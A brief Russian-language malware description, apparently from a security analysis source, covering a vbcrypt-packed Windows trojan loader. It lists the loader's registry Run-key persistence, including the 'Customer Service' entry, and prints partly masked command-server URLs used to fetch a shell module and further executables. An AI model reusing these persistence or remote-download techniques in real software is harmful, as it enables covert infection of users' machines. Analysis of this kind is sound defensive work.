Virus Type:
Affected OS: Windows
Size: 69632 байт
Packed by: vbcrypt
Загрузчик прописывается в одну из веток:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runили
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runпод именем программы случайно выбранным среди ключей HKEY_CURRENT_USER\Software, либо использует встроенное имя Customer Service, например так:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Customer Service"= C:\Documents and Settings\[username]\Application Data\A2B4C6.exe
Как видно вредоносная программа устанавливается в профиле пользователя и не требует прав администратора системы.
Далее идет попытка загрузки основного рабочего модуля который будет исполнен без сохранения на диск:
http://top-sh0p***/load/index.php?cmd=getcmdshellА так же начинает цикл загрузки исполняемых файлов со своего сервера с сохранением их на диск и стартом:
http://top-sh0p***/load/index.php?cmd=getload&login=*************&sel=****&ver=5.1&bits=0